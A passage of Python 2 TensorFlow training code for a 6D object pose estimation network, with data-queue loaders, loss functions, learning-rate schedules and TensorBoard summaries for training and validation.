self.snapshot(sess, iter_train, epoch)
losses_val = []
losses_cls_val = []
visualize_n_per_validation = 10.0
for iter_val in range(iters_val):
timer.tic()
if iter_val % round(iters_val / visualize_n_per_validation) == 0:
data, labels_2d, probs, loss_value, loss_cls_value, loss_regu_value, lr = \
sess.run([self.net.get_output('data'), self.net.get_output('label_2d'), self.net.get_output('prob_normalized'), loss, loss_cls, loss_regu, learning_rate])
#data, labels, probs, vertex_pred, rois, poses = combine_poses(data, rois, poses_init, poses_pred, probs, vertex_pred, labels_2d)
#im_label = imdb.labels_to_image(data, labels)
#vertmap = _extract_vertmap(labels, vertex_pred, imdb._extents, imdb.num_classes)
#plot_data(data, None, im_label, imdb._class_colors, vertmap, labels, rois, poses, [], intrinsic_matrix, imdb.num_classes, imdb._classes, imdb._points_all)
# more details at: https://stackoverflow.com/questions/38543850/tensorflow-how-to-display-custom-images-in-tensorboard-e-g-matplotlib-plots
#buf = io.BytesIO()
#plt.savefig(buf, format='png', dpi=500)
#buf.seek(0)
#img_summary = sess.run(img_op, feed_dict={img_str_placeholder: buf.getvalue()})
#current_iter = iters_train * (epoch + 1) + iter_val
#val_writer.add_summary(img_summary, current_iter)
#plt.close("all")
else:
loss_value, loss_cls_value, loss_regu_value, lr = sess.run([loss, loss_cls, loss_regu, learning_rate])
losses_val.append(loss_value)
losses_cls_val.append(loss_cls_value)
loss_val_summary = sess.run(loss_val_op, feed_dict={loss_placeholder: loss_value})
loss_cls_val_summary = sess.run(loss_cls_val_op, feed_dict={loss_cls_placeholder: loss_cls_value})
current_iter = iters_val * (epoch + 1) + iter_val
val_writer.add_summary(loss_val_summary, current_iter)
val_writer.add_summary(loss_cls_val_summary, current_iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, lr: %.8f, time: %.2f' % \
(iter_val + 1, iters_val, loss_value, loss_cls_value, lr,
timer.diff)
if (iter_val + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
coord_val.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t_val.join()
#loss_val_summary = sess.run(loss_val_op, feed_dict={loss_placeholder: np.mean(losses_val)})
#loss_cls_val_summary = sess.run(loss_cls_val_op, feed_dict={loss_cls_placeholder: np.mean(losses_cls_val)})
#current_iter = iters_train * (epoch + 1)
#val_writer.add_summary(loss_val_summary, current_iter)
#val_writer.add_summary(loss_cls_val_summary, current_iter)
sess.run(self.net.close_queue_op)
def train_model_vertex(self, sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_regu, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_regu: %.12f, lr: %.8f, time: %.2f' % \
(iter + 1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, timer.diff)
if (iter + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter + 1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate, iters_train, iters_val, data_layer, imdb):
"""Network training loop."""
# add summary
loss_op = tf.summary.scalar('loss', tf.squeeze(loss))
loss_cls_op = tf.summary.scalar('loss_cls', tf.squeeze(loss_cls))
loss_vertex_op = tf.summary.scalar('loss_vertex', tf.squeeze(loss_vertex))
loss_pose_op = tf.summary.scalar('loss_pose', tf.squeeze(loss_pose))
scalar_placeholder = tf.placeholder(tf.float32, shape=())
lr_op = tf.summary.scalar('lr', scalar_placeholder)
loss_val_op = tf.summary.scalar('loss_val', scalar_placeholder)
loss_cls_val_op = tf.summary.scalar('loss_cls_val', scalar_placeholder)
loss_vertex_val_op = tf.summary.scalar('loss_vertex_val', scalar_placeholder)
loss_pose_val_op = tf.summary.scalar('loss_pose_val', scalar_placeholder)
loss_val_mean_op = tf.summary.scalar('loss_val_mean', scalar_placeholder)
loss_cls_val_mean_op = tf.summary.scalar('loss_cls_val_mean', scalar_placeholder)
loss_vertex_val_mean_op = tf.summary.scalar('loss_vertex_val_mean', scalar_placeholder)
loss_pose_val_mean_op = tf.summary.scalar('loss_pose_val_mean', scalar_placeholder)
train_writer = tf.summary.FileWriter(self.output_dir + "/train", sess.graph)
val_writer = tf.summary.FileWriter(self.output_dir + "/val", sess.graph)
img_str_placeholder = tf.placeholder(tf.string)
image = tf.image.decode_png(img_str_placeholder, channels=4)
# Add the batch dimension
image_expanded = tf.expand_dims(image, 0)
# Add image summary
img_op = tf.summary.image("Val predictions", image_expanded)
coord_train = Coordinator()
coord_val = Coordinator()
if self.pretrained_ckpt is None:
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
else:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.saver.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
epochs = 5
intrinsic_matrix = get_intrinsic_matrix()
for epoch in range(epochs):
coord_train.run = True
coord_val.run = True
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord_train, iters_train))
t.start()
t_val = threading.Thread(target=load_and_enqueue_val, args=(sess, self.net, data_layer, coord_val, iters_val))
print("Epoch: %d / %d" % (epoch, epochs))
for iter_train in range(iters_train):
timer.tic()
loss_summary, loss_cls_summary, loss_vertex_summary, loss_pose_summary, loss_value, loss_cls_value, loss_vertex_value, \
loss_pose_value, loss_regu_value, lr, _ = sess.run([loss_op, loss_cls_op, loss_vertex_op, loss_pose_op, loss, loss_cls, \
loss_vertex, loss_pose, loss_regu, learning_rate, train_op])
current_iter = iters_train * epoch + iter_train
train_writer.add_summary(loss_summary, current_iter)
train_writer.add_summary(loss_cls_summary, current_iter)
train_writer.add_summary(loss_vertex_summary, current_iter)
train_writer.add_summary(loss_pose_summary, current_iter)
lr_summary = sess.run(lr_op, feed_dict={scalar_placeholder: lr})
train_writer.add_summary(lr_summary, current_iter)
#starter_learning_rate = cfg.TRAIN.LEARNING_RATE
#lr = sess.run(clr.cyclic_learning_rate(global_step=iters_train * epoch + iter_train, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10,
# step_size=2, mode='triangular2', gamma=0.99994))
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' % \
(iter_train + 1, iters_train, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, timer.diff)
if (iter_train + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
coord_train.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t.join()
t_val.start()
if iters_train > 0:
self.snapshot(sess, iter_train, epoch)
losses_val = []
losses_cls_val = []
losses_vertex_val = []
losses_pose_val = []
visualize_n_per_validation = 10.0
for iter_val in range(iters_val):
timer.tic()
if iter_val % round(iters_val / visualize_n_per_validation) == 0:
data, labels_2d, probs, vertex_pred, rois, poses_init, poses_pred, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_regu_value, lr = \
sess.run([self.net.get_output('data'), self.net.get_output('label_2d'), self.net.get_output('prob_normalized'), self.net.get_output('vertex_pred'), \
self.net.get_output('rois'), self.net.get_output('poses_init'), self.net.get_output('poses_tanh'), loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate])
data, labels, probs, vertex_pred, rois, poses = combine_poses(data, rois, poses_init, poses_pred, probs, vertex_pred, labels_2d)
im_label = imdb.labels_to_image(data, labels)
vertmap = _extract_vertmap(labels, vertex_pred, imdb._extents, imdb.num_classes)
plot_data(data, None, im_label, imdb._class_colors, vertmap, labels, rois, poses, [], intrinsic_matrix, imdb.num_classes, imdb._classes, imdb._points_all)
# more details at: https://stackoverflow.com/questions/38543850/tensorflow-how-to-display-custom-images-in-tensorboard-e-g-matplotlib-plots
buf = io.BytesIO()
plt.savefig(buf, format='png', dpi=500)
buf.seek(0)
img_summary = sess.run(img_op, feed_dict={img_str_placeholder: buf.getvalue()})
current_iter = iters_train * (epoch + 1) + iter_val
val_writer.add_summary(img_summary, current_iter)
plt.close("all")
else:
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_regu_value, lr = sess.run([loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate])
losses_val.append(loss_value)
losses_cls_val.append(loss_cls_value)
losses_vertex_val.append(loss_vertex_value)
losses_pose_val.append(loss_pose_value)
loss_val_summary = sess.run(loss_val_op, feed_dict={scalar_placeholder: loss_value[0]})
loss_cls_val_summary = sess.run(loss_cls_val_op, feed_dict={scalar_placeholder: loss_cls_value})
loss_vertex_val_summary = sess.run(loss_vertex_val_op, feed_dict={scalar_placeholder: loss_vertex_value})
loss_pose_val_summary = sess.run(loss_pose_val_op, feed_dict={scalar_placeholder: loss_pose_value[0]})
#current_iter = 796 * (epoch + 1) + iter_val + 1
current_iter = iters_train * (epoch + 1) + iter_val
#current_iter = iter_val
val_writer.add_summary(loss_val_summary, current_iter)
val_writer.add_summary(loss_cls_val_summary, current_iter)
val_writer.add_summary(loss_vertex_val_summary, current_iter)
val_writer.add_summary(loss_pose_val_summary, current_iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' % \
(iter_val + 1, iters_val, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr,
timer.diff)
if (iter_val + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
loss_val_summary = sess.run(loss_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_val)})
loss_cls_val_summary = sess.run(loss_cls_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_cls_val)})
loss_vertex_val_summary = sess.run(loss_vertex_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_vertex_val)})
loss_pose_val_summary = sess.run(loss_pose_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_pose_val)})
val_writer.add_summary(loss_val_summary, current_iter)
val_writer.add_summary(loss_cls_val_summary, current_iter)
val_writer.add_summary(loss_vertex_val_summary, current_iter)
val_writer.add_summary(loss_pose_val_summary, current_iter)
coord_val.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t_val.join()
sess.run(self.net.close_queue_op)
def train_model_vertex_pose_adapt(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer):
"""Network training loop."""
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, label_domain_value, domain_label_value, lr, _ = sess.run(
[loss, loss_cls, loss_vertex, loss_pose, loss_domain, label_domain, domain_label, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, loss_domain: %.4f, lr: %.8f, time: %.2f' % \
(iter + 1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, lr, timer.diff)
print label_domain_value
print domain_label_value
if (iter + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter + 1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_det(self, sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, _ \
= sess.run([loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_rpn_cls: %.4f, loss_rpn_box: %.4f, loss_cls: %.4f, loss_box: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' % \
(iter + 1, max_iters, loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, timer.diff)
if (iter + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter + 1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb
def get_val_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb_val
def load_and_enqueue_val(sess, net, data_layer, coord, iters=0):
iter = 0
data_layer._validation = True
while coord.run and iter < iters:
blobs = data_layer.forward(iter)
# blobs = data_layer.forward()
iter += 1
if cfg.INPUT == 'RGBD':
data_blob = blobs['data_image_color']
data_p_blob = blobs['data_image_depth']
elif cfg.INPUT == 'COLOR':
data_blob = blobs['data_image_color']
elif cfg.INPUT == 'DEPTH':
data_blob = blobs['data_image_depth']
elif cfg.INPUT == 'NORMAL':
data_blob = blobs['data_image_normal']
keep_prob = 1.0
if cfg.TRAIN.SINGLE_FRAME:
if cfg.TRAIN.SEGMENTATION:
if cfg.INPUT == 'RGBD':
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
else:
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, net.is_train: False, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
else:
feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
else:
if cfg.INPUT == 'RGBD':
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
else:
feed_dict = {net.data: data_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
else:
if cfg.INPUT == 'RGBD':
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}
else:
feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}
sess.run(net.enqueue_op, feed_dict=feed_dict)
def load_and_enqueue(sess, net, data_layer, coord, iters=0):
iter = 0
data_layer._validation = False
while coord.run and iter < iters:
blobs = data_layer.forward(iter)
iter += 1
if cfg.INPUT == 'RGBD':
data_blob = blobs['data_image_color']
data_p_blob = blobs['data_image_depth']
elif cfg.INPUT == 'COLOR':
data_blob = blobs['data_image_color']
elif cfg.INPUT == 'DEPTH':
data_blob = blobs['data_image_depth']
elif cfg.INPUT == 'NORMAL':
data_blob = blobs['data_image_normal']
keep_prob = 0.5
if cfg.TRAIN.SINGLE_FRAME:
if cfg.TRAIN.SEGMENTATION:
if cfg.INPUT == 'RGBD':
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
else:
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, net.is_train: True, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
else:
feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
else:
if cfg.INPUT == 'RGBD':
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
else:
feed_dict = {net.data: data_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
else:
if cfg.INPUT == 'RGBD':
feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}
else:
feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}
sess.run(net.enqueue_op, feed_dict=feed_dict)
def loss_cross_entropy(scores, labels):
"""
scores: a list of tensors [batch_size, height, width, num_classes]
labels: a list of tensors [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
loss = 0
for i in range(cfg.TRAIN.NUM_STEPS):
score = scores[i]
label = labels[i]
cross_entropy = -tf.reduce_sum(label * score, reduction_indices=[3])
loss += tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(label))
loss /= cfg.TRAIN.NUM_STEPS
return loss
def loss_cross_entropy_single_frame(scores, labels):
"""
scores: a tensor [batch_size, height, width, num_classes]
labels: a tensor [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
cross_entropy = -tf.reduce_sum(labels * scores, reduction_indices=[3])
loss = tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(labels) + 1e-10)
return loss
def loss_quaternion(pose_pred, pose_targets, pose_weights):
with tf.name_scope('loss'):
distances = 1 - tf.square(tf.reduce_sum(tf.multiply(pose_pred, pose_targets), reduction_indices=[1]))
weights = tf.reduce_mean(pose_weights, reduction_indices=[1])
loss = tf.div(tf.reduce_sum(tf.multiply(weights, distances)), tf.reduce_sum(weights) + 1e-10)
return loss
def split_regression_branch(var_list1, var_list2):
regression_vars = ['fc6/weights:0', 'fc6/biases:0', 'fc7/weights:0', 'fc7/biases:0', 'fc8/weights:0', 'fc8/biases:0']
for var in regression_vars:
var_list1 = remove_item(var_list1, var)
var_list2 = keep_items(var_list2, regression_vars)
return var_list1, var_list2
def remove_item(var_list, name):
return [i for i in var_list if i.name != name]
def keep_items(var_list, names_list):
return [i for i in var_list if i.name in names_list]
def train_net(network, imdb, roidb, roidb_val, output_dir, pretrained_model=None, pretrained_ckpt=None, iters_train=40000, iters_val=10000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
if cfg.TRAIN.SINGLE_FRAME:
# classification loss
if cfg.NETWORK == 'FCN8VGG':
scores = network.prob
labels = network.gt_label_2d_queue
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
# labels_val = network.get_output2('gt_label_weight')
loss_cls = network.get_output('loss_cls')
# loss_cls_val = loss_cross_entropy_single_frame(scores_val, labels_val)
vertex_pred = network.get_output('vertex_pred')
# vertex_pred_val = network.get_output2('vertex_pred')
vertex_targets = network.get_output('vertex_targets')
# vertex_targets_val = network.get_output2('vertex_targets')
vertex_weights = network.get_output('vertex_weights')
# vertex_weights_val = network.get_output2('vertex_weights')
# loss_vertex = tf.div( tf.reduce_sum(tf.multiply(vertex_weights, tf.abs(tf.subtract(vertex_pred, vertex_targets)))), tf.reduce_sum(vertex_weights) + 1e-10 )
loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
# loss_vertex_val = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred_val, vertex_targets_val, vertex_weights_val)
if cfg.TRAIN.POSE_REG:
# pose_pred = network.get_output('poses_pred')
# pose_targets = network.get_output('poses_target')
# pose_weights = network.get_output('poses_weight')
# loss_pose = cfg.TRAIN.POSE_W * tf.div( tf.reduce_sum(tf.multiply(pose_weights, tf.abs(tf.subtract(pose_pred, pose_targets)))), tf.reduce_sum(pose_weights) )
# loss_pose = cfg.TRAIN.POSE_W * loss_quaternion(pose_pred, pose_targets, pose_weights)
loss_pose = cfg.TRAIN.POSE_W * network.get_output('loss_pose')[0]
# loss_pose_val = cfg.TRAIN.POSE_W * network.get_output2('loss_pose')[0]
if cfg.TRAIN.ADAPT:
domain_score = network.get_output("domain_score")
domain_label = network.get_output("domain_label")
label_domain = network.get_output("label_domain")
loss_domain = cfg.TRAIN.ADAPT_WEIGHT * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=domain_score, labels=label_domain))
loss = loss_cls + loss_vertex + loss_pose + loss_domain + loss_regu
else:
loss = loss_cls + loss_vertex + loss_pose + loss_regu
# loss_val = loss_cls_val + loss_vertex_val + loss_pose_val + loss_regu_val
else:
loss = loss_cls + loss_vertex + loss_regu
else:
loss_cls = network.get_output('loss_cls')
loss = loss_cls + loss_regu
else:
# classification loss
scores = network.get_output('outputs')
labels = network.get_output('labels_gt_2d')
loss = loss_cross_entropy(scores, labels) + loss_regu
all_except_pose_fc_layers, pose_fc_layers = split_regression_branch(tf.trainable_variables(), tf.trainable_variables())
# print("######### VARS ###########")
# print(all_without_regression_branch)
# print(regression_vars)
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, cfg.TRAIN.STEPSIZE, 0.5, staircase=False)
learning_rate_pose_loss = tf.train.exponential_decay(starter_learning_rate/10, global_step, cfg.TRAIN.STEPSIZE, 0.5, staircase=False)
momentum = cfg.TRAIN.MOMENTUM
#learning_rate = clr.cyclic_learning_rate(global_step=global_step, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10, step_size=2,
# mode='triangular2', gamma=0.99994)
#train_op = tf.train.MomentumOptimizer(clr.cyclic_learning_rate(global_step=global_step, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10, step_size=2,
# mode='triangular2', gamma=0.99994), momentum).minimize(loss, global_step=global_step)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = tf.train.AdamOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
# train_op = tf.train.AdamOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step, var_list=all_except_pose_fc_layers)
# train_op_pose = tf.train.AdamOptimizer(learning_rate_pose_loss, momentum).minimize(loss, global_step=global_step, var_list=pose_fc_layers)
# val_op = tf.train.AdamOptimizer(learning_rate, momentum).minimize(loss_val, global_step=global_step)
# val_dict = {"val_op": val_op,
# "loss_val": loss_val,
# "loss_cls_vall": loss_cls_val,
# "loss_vertex_val": loss_vertex_val,
# "loss_pose": loss_pose_val
# }
# config = tf.ConfigProto()
# config.gpu_options.per_process_gpu_memory_fraction = 0.85
# config.gpu_options.allow_growth = True
# with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
#sess = tf_debug.TensorBoardDebugWrapperSession(sess, 'localhost:6064')
# data layer
if cfg.TRAIN.SINGLE_FRAME:
data_layer = GtSynthesizeLayer(roidb, roidb_val, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, imdb.data_queue,
cfg.CAD, cfg.POSE, imdb._class_colors)
else:
data_layer = GtDataLayer(roidb, imdb.num_classes)
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
print 'Solving...'
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
if cfg.TRAIN.POSE_REG:
if cfg.TRAIN.ADAPT:
sw.train_model_vertex_pose_adapt(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, iters_train, data_layer)
else:
sw.train_model_vertex_pose(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate, iters_train, iters_val, data_layer, imdb)
else:
sw.train_model_vertex(sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, iters_train, data_layer)
else:
sw.train_model(sess, train_op, loss, loss_cls, loss_regu, learning_rate, iters_train, iters_val, data_layer)
print 'done solving'
